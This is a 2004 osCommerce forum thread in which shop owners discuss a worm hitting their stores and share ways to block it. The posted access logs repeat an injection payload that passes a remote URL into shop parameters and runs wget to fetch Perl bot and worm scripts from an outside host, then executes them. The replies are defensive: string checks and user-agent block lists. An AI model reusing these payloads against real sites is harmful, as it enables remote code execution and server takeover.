Guest Posted December 26, 2004 Share Posted December 26, 2004 My host send me a message about a worm infection? They suspect the osCommerce script causes the problem :( (By the way I don't have phpBB on the site) They sent me this info about it: panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:41 +0100] "GET /conditions.php?osCsid=http://www .visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.vis ualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;p erl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27696 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /shopping_cart.php?osCsid=http:// www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www. visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.tx t;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23367 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:42 +0100] "GET /redirect.php?action=manufacturer &manufacturers_id=61&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%2 0www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net /zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:43 +0100] "GET /redirect.php?action=http://www.v isualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visua lcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;per l%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:44 +0100] "GET /index.php?manufacturers_id=61&am p;osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1 .txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt ;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 33435 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /index.php?manufacturers_id=http: //www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20ww w.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1. txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19601 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:45 +0100] "GET /specials.php?osCsid=http://www.v isualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visua lcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;per l%20ownz.txt;perl%20php.txt HTTP/1.1" 200 28147 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:46 +0100] "GET /product_info.php?products_id=396 &osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/wo rm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot. txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 23558 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /reviews.php?osCsid=http://www.vi sualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visual coders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl %20ownz.txt;perl%20php.txt HTTP/1.1" 200 36272 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:47 +0100] "GET /product_reviews_write.php?produc ts_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcode rs.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl% 20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:48 +0100] "GET /product_reviews_write.php?produc ts_id=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.tx t;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;pe rl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 5 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /index.php?osCsid=http://www.visu alcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualco ders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%2 0ownz.txt;perl%20php.txt HTTP/1.1" 200 32331 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:49 +0100] "GET /product_info.php?cPath=77&pr oducts_id=290&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visual coders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;p erl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19058 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:50:54 +0100] "GET /product_info.php?cPath=77&pr oducts_id=290&language=en&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;w get%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoder s.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19077 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:08 +0100] "GET /product_info.php?products_id=291 &cPath=77&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visual coders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;p erl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 25476 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:22 +0100] "GET /index.php?cPath=69&osCsid=ht tp://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%2 0www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20wor m1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 46505 "-" "LWP::Simple/5.800" panda.nl/statistics/logs/access_log.processed:209.51.158.129 - - [25/Dec/2004:02:51:50 +0100] "GET /index.php?cPath=24&osCsid=ht tp://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%2 0www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20wor m1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 27395 "-" "LWP::Simple/5.800" Anybody knows what this means? And what I can do? (I will contact the host too, but not today, since it's Christmas) Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 Would switching off perl help maybe? (see posted log) I don't need perl for the site, as far as I know :huh: Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 It's just eating bandwidth...nothing to worry about. Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 It's just eating bandwidth...nothing to worry about. Link to comment Share on other sites More sharing options...
Arcadiauk Posted December 26, 2004 Share Posted December 26, 2004 We've had this website in our site too, "www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.vi" etc etc" CHEMO, you say just eating bandwidth and nothing to worry about, have you heard of this before then? Derek Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 http://wordpress.org/support/7/19285 Link to comment Share on other sites More sharing options...
Arcadiauk Posted December 26, 2004 Share Posted December 26, 2004 CHEMO Just did a search on Google and found that. Just added the following to the top of my index.php as suggested... if (strpos($REQUEST_URI, 'visualcoders.net') > 0) { exit; }; Not sure if it will help though Derek Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 I would block the user agent but that is a personal choice... I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent. Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 Thanks for your tips! I would block the user agent but that is a personal choice... I happen to have my own server so just added it to my Apache config file to reject that "bad bot" agent. <{POST_SNAPBACK}> stupid question probably, but could you tell me how to find out what the user agent is? I also found this thread on the forums, it seems to be related http://www.oscommerce.com/forums/index.php?sho...14entry511814 So I will try to block by user agent, and ask the host to upgrade PHP also. Link to comment Share on other sites More sharing options...
stevel Posted December 26, 2004 Share Posted December 26, 2004 The user agent is "LWP::Simple/5.800". Steve Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 The user agent is "LWP::Simple/5.800". <{POST_SNAPBACK}> thanks steve, going to add that one right away! (allmost bedtime here, think I will sleep much better now :) ) Since I think I will need to know the user agent more often in the near future, could you tell me how I can find out myself next time? Link to comment Share on other sites More sharing options...
Arcadiauk Posted December 26, 2004 Share Posted December 26, 2004 Sorry to be thick, but where & what do I need to enter to block that user agent? Thanks in advance Derek Link to comment Share on other sites More sharing options...
Guest Posted December 26, 2004 Share Posted December 26, 2004 Hi Derek, it does not seem to help after all. It seems not to be visualcoders itself where the problem comes from (in my case), it's coming from lots and lots of different ip addresses from all over the world (so I guess the user agent will be different too). I included this into my application_top.php and added a blocked_agents.txt file to the includes directory (just as how the spider sessions are supressed) // banned user agents define ('BLOCK_BY_USER_AGENT','True'); if (BLOCK_BY_USER_AGENT == 'True') { $user_agent = strtolower(getenv('HTTP_USER_AGENT')); // $block_user_agent = false; if (!(is_null($user_agent))) { $blocked_agents = file('includes/blocked_agents.txt'); for ($i=0, $n=sizeof($blocked_agents); $i<$n; $i++) { if (!(is_null($blocked_agents[$i]))) { if (is_integer(strpos($user_agent, trim($blocked_agents[$i])))) { // $block_user_agent = true; exit('This user agent seems to be blocked!'); } } } } } Or maybe the above script itself does function properly? Didn't have to test it properly yet. Link to comment Share on other sites More sharing options...
Guest Posted December 27, 2004 Share Posted December 27, 2004 :blush: I didn't think, I am using the code from the osC spider session script, but I didn't notice the "strtolower", and added the agent name using capitals. Now I added "lwp" (without the quotes) to the list. Don't know if it works yet , suddenly they all come and the next moment they're all gone again. Link to comment Share on other sites More sharing options...
Guest Posted December 27, 2004 Share Posted December 27, 2004 blocking only "lwp::simple/5.800" does not seem enough, but it looks like blocking all "lwp" does help. Would it be wise to block all "lwp" user agents? Or am I blocking important search engines and/or lots of users too? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.